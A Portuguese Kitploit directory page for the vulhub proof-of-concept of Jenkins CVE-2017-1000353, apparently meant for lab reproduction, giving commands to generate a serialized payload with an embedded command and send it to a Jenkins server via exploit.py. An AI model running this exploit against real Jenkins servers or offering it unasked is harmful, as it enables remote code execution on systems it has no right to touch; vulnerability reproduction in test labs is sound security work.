Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-1000353 — jenkins CVE-2017-1000353 POC | Kitploit
Ferramentas/GitHubGitHub/vulhub/cve-2017-1000353
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubvulhub/cve-2017-1000353

CVE-2017-1000353

jenkins CVE-2017-1000353 POC

Ver Repositório
57625há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-1000353 POC

Como reproduzir o Jenkins CVE-2017-1000353?

Clone este repositório, use o payload pré-construído jenkins_poc.ser com o seguinte comando:

python exploit.py http://your-ip:8080 jenkins_poc.ser

Então o comando touch /tmp/success será executado.

Requisitos de Versão do Java

Importante: A geração do payload depende da versão do Java. Foi testado com sucesso em openjdk:8u292. Outras versões do Java podem não funcionar corretamente para geração e exploração do payload.

Como gerar o payload jenkins_poc.ser?

Baixe o CVE-2017-1000353-SNAPSHOT-all.jar.

java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Se estiver usando Docker, você pode usar o seguinte comando para garantir compatibilidade:

docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Referência

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353

Baixar ferramenta